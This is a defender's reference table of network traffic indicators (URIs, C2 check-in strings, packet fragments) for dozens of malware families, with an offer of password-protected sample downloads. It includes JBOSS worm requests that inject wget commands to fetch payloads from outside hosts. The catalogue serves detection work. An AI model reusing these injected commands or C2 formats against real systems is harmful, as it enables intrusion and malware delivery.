Library of Malware Traffic Patterns

Update February 2015: use the new link below for the new interface and updates.

Traffic analysis has long been a primary method of malware identification, and the thousands of IDS signatures developed for it are daily proof of that. Signatures definitely help, but the ability to visually recognize malware traffic patterns has always been an important skill for anyone tasked with network defense. The number of malware analysis blogs and papers is overwhelming, and it is difficult to keep track of malware features without access to a well-designed and constantly updated malware database. This started as a "personal notes" spreadsheet of GET and POST requests for different malware families, compiled from open sources. We decided others might find it useful too.

Click on a column header to see the most recent entries; use the other column headers to sort as needed. Wait a few seconds for the table to load from the Google Sheet. The URI and User-Agent fields may contain spaces inserted for easier cell wrapping; remove them if you export the data.
Yes, you can download the samples mentioned in the spreadsheet. See the "dl" column in the full spreadsheet table for links to the download location. Use the "Contagio" password scheme (email Mila or admin at deependresearch.org).

VIEW OR DOWNLOAD “MALWARE TRAFFIC PATTERNS”

List of malware families and available downloads for their samples and pcaps (click on the link above for the full post).

type family method uri
CRIME Carberp / Glupteba GET /get_ads.php?yy=1&aid=2&atr=exts&src=199
/go/p1011105.subexts
/go/page/landing_page_68?nid=14&layout=qna&pid= p1011105.subexts&ip=auto&no_click=1&alpo_redirect=1
/javascript/live_cd/popunder_script-1400195675.js
/images/ffadult/css/header.css
/css/live_cd/ffadult/chinese/0/global_facelift-1414007370.css
CRIME Fiesta EK GET /?_SPMq=vahK1gfvq3&z1_Aj =fW8sL8ld&nkPgy= 81S8Y0_&0Us9=dr_fSq3Jai&w7Eaf= fu5dv5&wDK9=Ydqk1z4o6&52YRK=eHl9jdJ8j&I86 __=He0S4m9G&QPy3i=J4HP58S7h&dRPS8=7bi7Y
/?3W_wN=I40_W5_&eht =t8vP8M8L&2ad_uO= 33KPa&_s3oi=8P5_7&QLfo= cHai8w&ZM7P_K=bSG7TH3p&UKb38= 1s4wx2s&jSJyB=cM7c
/?sk9=7ufJ8Ky7H8nS34n7f1h8t887R49&eDf= 1foPbZaw1VcxcHlfJdVw83P69hP1uSdYbR
/?_I4XS=idKbueq4kR1q8&0TsZ= Y0Wn7Lbr6K9hch&thXvW=56WPaqG2OdJ0&Ff_lty= x21dbrs8y5
/?m_FxE=eh0&MkFq=H8GeS&fz7= 1l3&d2T6r=ae&LeH_9= k0Il2W&Z7i6=3S1&7h_ =Sdlc&zmGAU=i0uf&mMwf=ehp5p& ymV7T=y7lKe&Jpk_DF=_5_2
CRIME Fiesta EK GET /yzzzpiehxpvij8ps46znskyaqfa5ijkduakhxwcbj9
/ai_qkvu2/4a374fcc5b4966050058040c015d5253005 2030f0f5201530f54070e0507525450;118800;94
/ai_qkvu2/074f70a95a1651de5952585d020b5009040 4045e0c0403090b02005f0651500e54
CRIME Gongdad / Gong Da compromised site redirects GET /pg/kcp/index.html
/popup/index.html
/my/by4.html
CRIME Gongdad / Gong Da EK GET /data/file/cr/index.html
/data/file/cr/swfobject.js
/data/file/cr/jquery-1.4.2.min.js
/data/file/cr/main.html
/data/file/cr/AyVpSf.jar
/data/file/cr/com.class
/data/file/cr/edu.class
/data/file/cr/net.class
/data/file/cr/org.class
/windos.exe
CRIME Dalexis Loader GET /tmp/pack.tar.gz
/assets/pack.tar.gz
/piwigotest/pack.tar.gz
/histoiredesarts/pack.tar.gz
/fit/pack.tar.gz
APT Gholee / Rocket Kitten GET / POST /index.php?c=Ud7atknq&r=17117d
/index.php?c=Ud7atknq&r=1710b2
CRIME Zemot GET /b/shoe
CRIME Zemot DL via Asprox GET /catalog/159
CRIME Zemot downloading Rovnix GET /mod_jshopping_products_gdle/mod_smartslider2/
CRIME Zemot downloading Rerdom GET /mod_jshoppi/soft32.dl
CRIME Rerdom GET /b/eve/
CRIME Clickfraud GET /b/req/
CRIME Cidox / Rerdom / Clickfraud GET /b/eve/e91425775cc5d7e657bd2cc7
/b/letr/21D84379F768D95442B92BC5
/b/opt/E1805AD5D79824076249D696
/b/req/FDD953BA382388758DF27AE4
/b/pkg/
CRIME Cidox / Rerdom / Clickfraud – clickurl GET GET /x/48petqwk9//AA/0
CRIME Cidox / Rerdom / Clickfraud – clickurl GET GET /2014/06/26/new-game-tech-behind-scenes-sony -playstation with referrer http://controller-best.com
APT / CRIME Scieron / Httneilc / HTClient packet data 0000 16 03 01 00 41 01 00 00 3d 03 01 54 c1 2a fa 82
0010 a5 0b 00 4c 7b 26 c9 33 81 bd 63 34 08 ab b3 38
0020 3a de 83 db b1 9c 95 02 3e c3 34 00 00 16 00 04
0030 00 05 00 0a 00 09 00 64 00 62 00 03 00 06 00 13
0040 00 12 00 63 01 00
CRIME Zollard RFI POST /cgi-bin/php? %2D%64+%……%2D%6E
CRIME Upatre GET /js/jquery-1.41.15.js
/js/jquery-1.41.15.js?aCNDrnl3=[user-agent string]&hjmcSOLrVb5fK5a =1846&kZuJV1OyPrXdK0= 1267859342&OjyOcmABhJHuu=gDyC5hx734Wu1.js
/js/jquery-1.41.15.js?get_message=3290013886
CRIME Cryptowall 3.0 POST http://proxy1-1-1.i2p/fee4roy2hih9
http://payto4gtpn5czl2.torforall.com/ofs20c
CRIME Andromeda POST /ldr.php
CRIME Angler EK Chain GET /t19jl0hvv2.php
CRIME Angler EK Chain GET /752s2n0ndw.php
CRIME Angler EK Chain GET /erL0pIvz9_wyAlk2koy7L4b2qScYutODp2Cm dYZyW hw1bW9lGM8EDW8cKKjx47cp
CRIME Angler EK Chain GET /P-SqI9OgILhp9clsf2ne5wgWHy4i2ew2hy 48WScNKA 9m2DKeiJNTp7gSxYSPcXsN
CRIME Angler EK Chain GET /models/runway/ring/header.js
CRIME Angler EK Chain GET /code/decrease/revenue/core.js
CRIME Asprox / Kuluoz GET /include.php?t=20lB5S+e4qW48vWs/RXbneRWTR9t JTB67xoumOnEvak=
HTTPS over port 443 as a possible connectivity check
CRIME Asprox / Kuluoz POST /index.php
CRIME Chanitor POST /gate.php
CRIME Chanitor Downloads GET /wp-includes/js/tinymce/plugins/wpfullscreen/1.php
/wp-includes/js/tinymce/skins/lightgray/1.php
/wp-content/plugins/motopress-content-editor /flexslider/fonts/1.php
/wp-includes/js/tinymce/plugins/wpfullscreen/1.php
CRIME Cryptowall POST /532boskc3i0
/nvebi4m4ggdokz
/wbkljtzpimbryt
CRIME Cryptowall GET /wp-content/themes/exiportal/dh5x3a1815j
/wp-content/themes/esther/6l7de
CRIME Dridex payload GET /mopsi/popsi.php
/js/bin.exe
CRIME Fake AV post compromise GET /?0=13&1=1&2=15&3=i&4=7600&5=0&6=1111&7 =kyxnujmwnn
CRIME Fiesta EK GET /txf9p_v8/ye1PlchZ7X9pFcl0o-y3
/txf9p_v8/14dcb5b6b53272fd050d5358500e540100 0750585657520d0400060703005305 ;114402;287
/txf9p_v8/4dc239e53174afbc5d010f0901025302055 75709075b550e01500156520c5406
CRIME Flashpack EK GET /sv62a76d18537/index.php
CRIME GameThief POST /tj.asp
CRIME GameThief GET /count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP& iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack
CRIME Gypothy GET /bigbight/kinkong.txt
CRIME H-W0rm POST /SpCoderHere
CRIME KaiXin EK GET /indexindex/
/indexindex/gg.jpg
/indexindex/jquery-1.4.2.min.js
/indexindex/swfobject.js
/indexindex/main.html
/xzz1.exe
/indexindex/NlNwQh.jar
/indexindex/com.class
/indexindex/edu.class
/indexindex/net.class
/indexindex/org.class
CRIME Kovter POST /9/form.php
/11/form.php
/w1/form.php
/1/feed.php
CRIME Nuclear EK GET / POST /XhBWV0gBT08OVFVW.html
/AwoVGwxQAEcOVRleDlRTBgMFR0tUV1YOVFcAHA JDQUhXVlxUVgdOVRtA
/ABsJAkgKUURCGlYaShlWAAACQUJfV1RCGVYEBh 1GRlVLVEJLVgUBT0AONi0fCB0j
CRIME Poweliks GET /query?version=1.7&sid=1101&builddate=201214&q= low+testosterone+in+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
/query?version=1.7&sid=1101&builddate=201214&q= fast+weight+loss&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
/query?version=1.7&sid=1101&builddate=201214&q= pain+in+knee+cap&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
/query?version=1.7&sid=1101&builddate=201214&q= anti+aging+cream+for+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; I Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
CRIME Redirect to Fiesta EK GET /?iVXpY9be=J8v3ax4v1&V5=1lM9es5-U2&npv_F-g= aPp8X- 02- GbU&b-nd9=-2-7nwdGa9Y&_6nQ=Y90gT9oPejrdO &m_h=bv_8fzs0m6H&Zg_-tWd=f-bj0I9sai&hfUK=b3
CRIME Sweet Orange EK GET /admin4_account/mobile/movies.php?timeline=18
/bad/generic/help.php?state=39
/cnet/tmp/Indy_admin/investor.php?setup=20
/dbadmin/wp-admin/hex/help.php?state=33
/forums/example/screens/investor.php?setup=20
/gcc/tmp/bad/help.php?state=25
/ip/ch/investor.php?setup=20
/profiles/stat/movies.php?timeline=21
CRIME Sweet Orange EK GET /printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064
/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064&errfix=urepair
/printer.php?rates=1764&catalogp=4&pixel=294&speeches=171 &shows=2171&trans=867&misc=1087&urepair=errfix
/store.php?back=669&nav_m=75&sendmail=4&stats=1186 &logout=171&state=2215&CRIME=2249
/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535
/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535&repfix=fixutil
/teen.php?cpan=2441&soma=4&subs=2093&pipermail=171 &feed=2093&film=663&comp=954
/serial.php?help=805&browsers=4&about=2398&icons=171 &music=247&sony=430&work=2315
CRIME TBD POST /store/
CRIME TBD Post Flashpack GET /r?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ
/search?q=wrestling&subid=4699
/click?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ
CRIME TBD Proxy (Htbot?) GET /ocfg.php?command=getip
/ocfg.php?command=getid
/ocfg.php?command=ghl&id=1493496
/ocfg.php?command=dl&id=1493496
/ocfg.php?command=version&id=1493496
/ocfg.php?command=getbackconnect
/pointer.php?proxy=%3A24635&secret=BER5w4evtjszw4MBRW
CRIME Upatre GET /1501us22//0/51-SP3/0/
/1501us22//1/0/0/
/2807cw//1/0/0/
/2807cw//41/5/4/
/2807cw//0/51-SP2/0/
/1201uk1//1201uk1//0/51-SP3/0/
/1201uk1//1/0/0/
/1201uk1//41/7/4/
/2307stat//0/51Service%20Pack%202/0/
/2307stat//1/0/0/
/2307stat//41/5/4/
CRIME Vawtrak / Neverquest POST /collection/0000004E/00/9EBD6132
CRIME Zeus GET /backup/config.bin
/en/images/config.bin
/guardnow/config.bin
/guardnow/config.bin
CRIME Zeus POST /choosen/helps/file.php
CRIME AdWare Kraddare.IL GET /bv/config.php?q=^/irW@RwOC6RKkFiJgWt_ESwGQKBP… ..@RwNPRwNN::
CRIME AdWare Kraddare.IL POST /bv/config.php
CRIME Dyre GET /2001uk11/HOME/1/0/0/
CRIME Dyre GET /mandoc/eula012.pdf
CRIME Dyre GET /mandoc/ml1from1.tar
CRIME Dyre plugin dl GET /ineede900.rar
CRIME Kazy GET /cmd/api.php?mk=20140708041847777&action= get_availability&partoffer_id=11229&a2=FR
CRIME Mudrop GET /gcs?alpha=YBvfs8NDNYK3vSEO+ p6fL2KZts4yS8inp2oWpqiDOinE/IJmP6Ktx9+Px+c=
CRIME ChePro (Brazil.banker) GET /ini/xvwmmwb.mod
CRIME Cryptolocker POST /home/
CRIME Reedum 220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]
APT Vidgrab POST (172.16.253.130)|1067|WinXP|D|L|No| 0..0….1..52..|No|V2010-v24|2184|0|3111947|0|1|.
APT Page / stscout / Elise / lStudio / Wumins GET /29af9cdc/page_12082223.html
CRIME Tijcont GET /s/blog_b2afd7fe01019tkf.htm
APT Darkcomet GET /a.php?id=c2ViYWxpQGxpYmVyby5pdA==
CRIME Kelihos GET /index.htm
CRIME Kuluoz Run command from C2 n c=run&u=/get/7d2c37d2070e1b38 6070db8c851dae08.exe&crc= 9e2b9c4f465 b765fc971423935c4b68e
APT njRAT / Backdoor.LV lv|'|'|TndfQzQyNjRFQkI=|'|'|VICTIM|'|'| Examiner|'|'|2013-06-21|'|'|USA|'|'| Win XP ProfessionalSP2 …

171.ll|'|'|Li4uLi4uLk5FVy4uLi4u Li4uX0F FNTJDMzdE|'|'|SENTA|'|'| sentai55|'|'|15-01-29|'|'||'|'| Win 8.1SP0 x64|'|'|Yes|'|'|0.7d| '|'|..|'|'||'|'|b88ece4c04f706 c9717bbe6fb da49ed2,132.inf|'|'|Li4uLi4uLk5FVy4uL i4uLi4uDQpyZWVlZWVk LmR5bmRucy5iaXo6M jUyNTQNCkFwcERhdGENCldpbnJhci5leG UNClRydWUNCkZhbHNlDQpU cnVlDQpGYWxzZQ==0.

251.ll|'|'|Li4uLi4uLk5FVy4uLi4uLi4uX0FFNTJD MzdE|'|'|SENTA|'|'|sentai55|'|'|15-01-29|'|'||'|'|Win 8.1SP0 x64|'|'|Yes|'|'|0.7d|'|'|..|'|'|QnVyd 2VsbCB2LiBIb2JieSBMb2JieSBBYnJpZGdlZCBbQ29tcGF0aWJpbGl0eSBNb 2RlXSAtIFdvcmQA|'|'|b88ece4c04f706c9717bbe6fbda49ed2,

lv|'|'|VHJvamFuX0M0NkY2RTk= |'|'|MARK|'|'|user |'|'|2013-11-22|'|'||'|'|Win XP|'|'|No|'|'|0.6.4|'|'|..|'|'||'|'|[endof]

CRIME Chimerka.1 / Refyes.A POST /sys.php
CRIME Sality GET /images/logos.gif?1f5428=8212640
CRIME Nitedrem GET /down.asp?action=install&u=cpmcpm&p= 2366A64BAA384EA6AB9CEF73E8E2BE12&t =7393
CRIME Nitedrem GET /upx/kod.txt?k=123&t=7215
CRIME Nitedrem GET ……………2817324n-79s4-43q8-8n2n-676s3qr1ops5:……………
CRIME Nitedrem GET /config.txt?&t=4593
CRIME Nitedrem GET /fish.jpg?&t=4426
CRIME Sality GET /?12da89=12355930
CRIME Sality GET /images/logos.gif?114bbc=9068000
CRIME Sality GET /setting.doc
CRIME Torpig /Sinowal miniloader GET /
CRIME Torpig /Sinowal miniloader GET /search2?fr=altavista&itag=ody&q= b88d6ce7e9fe419788716298cc747adc %2C93a5d8146fea0bbb&kgs=1&kls=0
CRIME EK Popads GET /?7d456d68729292e9843cb9dde2d2f7b4=34
CRIME EK Popads GET /4d23ccceb2cf9e6c1c91df06170259d3/32cd ad27bdec4a68d8efc9bb835008e6.swf
CRIME EK Popads GET /855feed4acbb99c63ad7f25fef289284/decaff5b6ee 641742f53d8ef8c6f9a16.jar
CRIME EK Popads GET /?c480cfaa684e1dc0db1b2e1f891d814a= a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in
CRIME EK Popads GET /39ff9ff8c3b603d8eed017df64dd2799.eot
CRIME Alina POS v5.6 POST /duck/push.php
CRIME Alina POS v5.6 POST /adobe/version_check.php
CRIME Alina POS v6.0 POST /adobe/version_check.php
APT (IN) Hanove / Tourist POST /kamp.php
APT Surtr 2nd Stage DL 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …….. ……..
APT Surtr 2nd Stage DL 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …….. ……..
APT Surtr Initial GET 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …….. ……..
APT Taleret GET /
APT Taleret GET /jw!Dyz0_2mTExQ0xbBnlp.RZcXoHmU-
CRIME Sweet Orange EK GET /in.php?q=WPOChVXlw9QiOTwtCbg+ uSk36elyOCiUwI99U0PYxA==
CRIME ArcomRat / Dokstormac POST S_0001[!^]NEW
[!^]127.0.0.1[!^]COMPUTERNAME[!^] username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption [!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^]
CRIME Ardamax keylogger SMTP 220 smtp.mail.yahoo.com ESMTP ready
EHLO DELLXT
250-smtp.mail.yahoo.com
CRIME Matsnu – MBR wiping ransomware POST /f44/myse.php
CRIME Mutopy Downloader GET /d/conh11.jpg
CRIME Mutopy Downloader initial callback GET /protocol.php?p=3894120584&d=4fQm27CpL9m6oC7 QvLZomrXyeYvptmyetaVE2deiLdi4
CRIME Symmi Remote File Injector GET /img/seek.cgi?lin=100&db=dfs
/ae1.php
/ggu.php
/wp-content/gallery/28-juli-sundsore/options.php [wordpress url – varies]
CRIME Matsnu – MBR wiping ransomware GET /inbox.php?ltype=ld&ccr=1&id=E81B90884C4C45445458 &stat=0&ver=2000803&loc=0x0409&os=Windows%20XP
CRIME Adware Hotbar POST /vic.aspx?ver=4.0.1158.0&rnd=595937
CRIME Blackhole v2 GET /7fc107b56efd7920/7fc107b56efd7920/q.php?kf=1f:1o:1m:2 w:1o&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&a= 1f&zg=c&tn=g&jopa=1658622
CRIME USteal.D 220———- Welcome to Pure-FTPd ———-
APT Hangover Smackdown Minapro GET /flaws/snwd.php?tp=1&tg=[ID]&tv=Error[]&ts= [PLATFORM]&mt=[account]&tr=[NoFiles]&Y1Y5F2
CRIME Cutwail / Pushdo POST /?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe
APT Mediana Proxy GET /index.htm?n763t4OPmrs6fXq7fXp7uj16e-r&Length=0
CRIME Zeus POST /orders2010.php
/busted.php
CRIME Gypthoy POST /opt/mainpage.php
APT Hupigon / Graybird ………………………………….;… Windows XP 5.1 (2600.Service Pack 3)…………………….. ………………………………..$…DELLXT……………………………… ……………………………… ……………………………………. 4s.love…….HACK..
APT Variant Letsgo / TabMsgSQL downloader (comment crew) GET /index.htm
APT Tapaoux GET /ol/yahoo/banner4.php?jpg=../yahoo
CRIME Horst Proxy GET /socks/proxy.php?ip=172.16.253.129&port= 41080&os=XP&iso=USA&smtp=0
CRIME PassAlert GET /loader/bin/file1.exe
CRIME Bitcoinminer POST /
CRIME Karagany Loader GET /user/go.php?html=do
APT Gh0st Gh0st….d…x.Kc“….@……L@:8..,39U! 1
APT IXESHE GET /AWS96.jsp?baQMyZrdI5Rojs9Khs9fhnjwj/8mIOm9j OKyjnxKjQJA
x_bigfix_client_string: baQMyZrdqDAA
APT2 KoreanBanker DL GET /web/down/kbs.exe
APT Plugx SSL – see http://4.bp.blogspot.com/-m2u0QTwirDk/UYO4 6Pm7OOI/AAAAAAAAAFw/SG_eKhd1-Nw/s640/Untitled.png
CRIME PowerLoader POST /postnuke/blog.php
APT RssFeeder (moved from TBD tab, common name still unknown) 2nd stage POST /orange/news.php
APT RssFeeder (moved from TBD tab, common name still unknown) initialGET POST /data/rss
APT Swami GET /im/linux.php
CRIME GameThief GET /xx/get.asp?mac=7641FAC9F7B2AAF71B6DE505B4 D468A2&os=winxp%20 Professional&avs=unknow&ps=NO.&ver=0005&pnum=16
CRIME Beebone downloader GET /0/?f|-1813912965Admin
/a/76876332/1
CRIME Neutrino EK var POST /cxiqocvbqd
APT Comfoo / Vinself / Mspub POST /BmYBcnhwJxwk/VTlaMWlnYEw12511/18688/ 12AzAONjkCYw/UD1aND43a0xiWQ161/
APT Destory Rat / Sogu / Thoper POST /update?id=000f72b8
APT2 Disttrack / Shamoon GET /ajax_modal/modal/data.asp?mydata=AA== &uid=aaa.bbb.ccc.ddd&state=3067203
CRIME Avatar Rootkit GET /search?query=EZTFDHWP&sort=relevance http://groups.yahoo.com/search?query=EFS9KHRF&sort=relevance
APT 9002 POST 9002………………wx….9002………………wx….9002…………………..
APT MSWab /Yayih POST /bbs/info.asp
CRIME ZeroAccess / Sirefef GET /stat2.php?w=65&i=58d7f947d2d1f947e5de1a07e596ae05&a=25
/count.php?page=952000&style=LED_g&nbdigits=9
CRIME ZeroAccess / Sirefef ppc fraud – redirect GET HTTP/1.1 302 Moved Temporarily
APT 9002 POST /2d
CRIME Asprox / Kuluoz gets list of C2s GET /4213D5182A41F58F3D01D8208B0BE9633A985A4C 35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0
CRIME Asprox / Kuluoz Checkin GET /4213D5182A41F58F3D01D8208B0BE9633A985A4C 35C70A97FF61249661F38426DA71D12B40F9A512B 6C945CD85462CD565962B6C5CACB1B09F86B1651 EB971F3013D14695028FE0BEBD838B9D3C5DE002 EA95371E51B0E8CFB7567F6BF
CRIME Asprox / Kuluoz GETs spam template GET /78dc91f1D56B9COC18B818A7A2B272F43O3A621C AEOC17O479E4E9A69B82
CRIME Carberp POST /kmqkcicalxrntrngwdxjyxztxcqkoyjn bdoafqirgnwwvpcjqglucovna.htm
CRIME FakeAV var (via Kuluoz – Asprox botnet) GET /AFC392A9570E45C188F468429F6349E82ABF530D 32184946F872BB899FAECD808398A1630AEB78FE6EE44AB3 34A67A0A45B4ED8A690330E832085902F0146216 16CEB4AF702F4E5B37A9F53B21242F
APT Favorites GET /download731106?h1= FIFEFDAHAPGDENCMFOFFFCAGAE
APT Favorites GET /search?qu=
APT Favorites GET /search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEF DAHAPGDENCMFOFFFCAGAE
APT Favorites GET /search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE
APT Favorites POST /search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH
APT Favorites POST /upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE
APT Gh0st GET /cgi/online.asp?hostname= [COMPUTERNAME]&httptype=[1][not%20httptunnel]
APT Gh0st var GET /h.gif?pid =113&v=130586214568 HTTP/ 1. 1
CRIME Guntior – CN bootkit GET /yx/tongji.html
CRIME Kuluoz.B downloader GET /index.php?r=gate&fq=acc0e9de&group=sl15&debug=0
CRIME Ranbyus / Triton (Spy, Banking, smart cards) POST /releases/index.php
CRIME Urausy (Ransomware) GET /ixjxqn-jtixjx-qnjt_tfdhgj-opjx-gxytfqbqgsusltnojtyhsn_syvrzh-htof-clgowkblrzrqfrgsuqgdit_ruky_.php
APT Glasses GET /ewpindex.htm
APT IEXPLORE Rat / C0D0S0 /Briba / Cimuz / SharkyRAT POST /index000000001.asp
APT LURK GET LURK0……..x.kf.e.apgpbpa0c..#……..
APT DNSWatch / Protux GET /dns/dnslookup?la=en&host=picture.ucparlnet. com&type=A&submit=Resolve
APT DNSWatch / Protux GET /news.jpg
APT DNSWatch / Protux POST /PHqgHumeay5705.mp3
CRIME Andromeda POST /new/gate.php
CRIME Citadel POST /g.php
CRIME Citadel (Zbot var) POST /C270suqdh/file.php
CRIME Pony loader POST /ponyb/gate.php HTTP/1.0
CRIME Reedum GET 220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]
APT APT1 WEBC2_RAVE GET /comp/sem/resources.htm
APT backdoor ? GET /18110123/page_32262 308.html
APT Banechant 1 GET /IGKKT
APT Banechant payload dl 2 GET /adserv/logo.jpg HTTP /1.1
APT Beebus GET /windosdate/v6/default.aspx?ln=en-us
APT Beebus C2 checkin GET /s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZge NAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1
APT Beebus C2 checkin GET /s/asp?XAAAAM4w5jmOS_kMZlr67o8jettxsYA8d ZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1
APT Beebus data send POST /s/asp?__ uLBwO1bAMKBgG2BQAAAAEAAAACAAAAAAAAAG9zYW11 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA VwBJAE4ARABPAFcAUwBNAEEAQQBOAEU AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAA==p=2
CRIME EK Blackhole 2 GET /fded177fe12651bb038f3f11b01c4168/q.php
APT Cookies /Cookiebag / Dalbot GET /1799.asp
APT Cookies /Cookiebag / Dalbot GET /3961.html
Cookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtle T0zOTU0 O2hvc3RuYW1lPXZpY3RpbTs=
APT Cookies /Cookiebag / Dalbot GET /8223.asp (also can be like /2007.asp,/2013.asp etc
APT Cookies /Cookiebag / Dalbot GET /indexs.zip
APT Coswid GET /old/google.png
APT CVE-2012-0754 SWF in DOC GET /test.mp4
APT CVE-2012-0779 GET /essais.swf?info=789c333230d13331d53337d63 3b3b432313106001afa0338&infosize=00FC0000
CRIME Darkmegi GET /20111230.jpg
CRIME Darkness DDos v8g GET /index.php?uid=587609&ver=8g%20XP
APT Depyot GET /new/3d/d/pdf.php?id=2
APT Destory Rat / Sogu / Thoper POST /update?id=000f6b50
APT Destory Rat / Sogu / Thoper POST /update?id=3109c2a2
APT Destory Rat / Sogu / Thoper POST /update?product=windows
CRIME DirtJumper DDoS POST /678/index.php
CRIME Dirtjumper ddos POST /boi854tr4w.php
CRIME DNSChanger POST /d56sc1d56scd56sc1.php?ini= v22Mmjy0SYXyWT I0tQ0QQOdqOb68 J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV75 0QegiB MF4XAHPzbYqRtufQpaX/M/trvO7ukg==
APT Downloader BMP GET /images/evil.bmp
APT Einstein GET /gttfi.php?id=019451425260376469&ext =YmFkc3R1ZmYuZGxs
APT Einstein data send POST /gttfi.php?id=019451425260376469& ext=ixioJXXJFCRrrDatKHhK
CRIME EK EK – Blackhole 2 landing GET /news/default-php-version.php?mdm=30:1g:2v:1f:1o& xguc= 3b:3i:39: 35&nze=1l:1f:30:1l:2v:30:1m:2v:1n:30&bhn=lixvdd
CRIME EK EK Blackhole 1 GET /showthread.php?t=d7ad916d1c0396ff
CRIME EK EK Phoenix GET /navigator/jueoaritjuir.php
APT Enfal / Lurid GET /oi2c/wlc3/ [redacted]:00-00-00-00-00-00/ij83d
APT Enfal / Lurid GET /trandocs/nm/.[redacted] :00-00-00-00-00-00lCrrrwhite
APT Enfal / Lurid POST /cgi-bin/CMS_SubitAll.cgi
APT Enfal / Lurid POST /cgl-bin/Owpq4.cgi
APT Enfal / Lurid POST /Sjwpc/odw3ux
CRIME Flashback OSX GET /statistics.html
APT Foxy POST /404error.asp
APT Foxy Checkin GET /images/leftnav_prog_bg.jpg
APT Gh0st ASP ver GET /1/v2/1oginv2.asp?hi2wsdf351&x.’..[xf)..<.3XqHr….)IL{..&y192.168.0.69
APT Gh0st PHP ver GET /ld/queenfun/vl /login.php?cd2hpdGU&uU11T VEV&s&pMTkyLjE2OC4wljYS&hi2wsdf35l
APT Gh0st v2000 var n v2010……..f……………( ……Service Pack 2..?..|…|…|0.@..
APT GoogleAdC2 GET /html/lost.html
APT GoogleAdC2 2nd stage GET /Trojan2.jpg
APT Googles GET /sll/monica.jpg
APT Greencat GET //
APT Gtalk GET /facebook.png
Hacktivism HOIC DDoS GET / HTTP/1.0
CRIME Imaut GET /setting.doc
CRIME IRCbot GET /check_ver.php?version=1.09
APT IXESHE GET /AWS26329.jsp? UrFvwIJIOKTRyfxR9KNRqhg8lcPr/ CGjUwP8y JUs7RjH7OinJ/85cgrqiP8jKGjpqgb/ wTrO7OIjhxoHcGaFa URqK/aHophHLd23K=NHk= a9oQ hvDQaLky8qo/RnJz42A
APT IXESHE AES GET /AES210001 129016878.jsp?UrFwUIO3h7ofgw QInYPRbkQaHVM9Bih7kZ9rO+pKUrbklllsgfOk= +LLQhpkZ9LOhGbgqvJghHci7M
CRIME JBOSS worm GET /zecmd/zecmd.jsp?comment=perl+lindb.pl
CRIME JBOSS worm GET /idssvc/idssvc.jsp?comment= wget+http://webstats.dyndns.info/javadd.tar.gz
CRIME JBOSS worm GET /iesvc/iesvc.jsp?comment=wget+http://magicstick.dyndns-remote.com/kisses.tar.gz
APT Letsgo / TabMsgSQL GET /indexbak.asp?rands= IXLCGIXELZ&acc=&str= select%20id%20from %20tab_online%20 where%20regcode%20=%20'IXLCGIXELZ'
APT Letsgo / TabMsgSQL GET /safe/1.asp?rands=DWLLOXLGLH&acc=vy&str= select%20top%201%20%20 from%20tab_message%20where%20toid%20= %20'198'%20order%20by%20id%20asc
APT Letsgo / TabMsgSQL GET /safe/1.asp?rands=XJOTLVALQF&acc=vy&str= insert%20into%20tab_online%20 (mode,clientname,clientip,accessip,onlinetime, lasttime,regcode)%20values%20 ('0','victim','192.168.1.12','145.42.112.19', '2011-06-08%2013:45:54', '2011-06-08%2013:45:54','NMQVPTXFBH')
APT Letsgo / TabMsgSQL downloader GET /new/iistart.html
APT Likseput GET /index.html
APT Lingbo (?) POST /windowsupdatev7/search%3 Fhl%3cWABQAFMAUAAzACOAUgA5 ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADI ALgAyADkALgAwAC4AM QAxADYA%26 meta%3DMDAwMGhIÆÑuMDk %3D%26id%3Dlfdxfircvscxggb
APT Luckycat – WIMMIE POST /count/count.php?m=c&n=[HOSTNAME]_
CRIME Medfos GET /uploading/id=1888546865&u= 4WWbvjA+sJYdYzrNmxr7vmGjfIZ4m ztoS3uBwEbXacviRtjYIg2xcKQMAWYaZM 4RqxalcusDRHEOWDjvdOj3ww==
APT MiniASP GET /device_asp?device_t=&key=&device_id=&cv=
APT MiniASP GET /record.asp?device_t= &key=&device_id=&cv=&result=
APT Miniduke POST /index.php
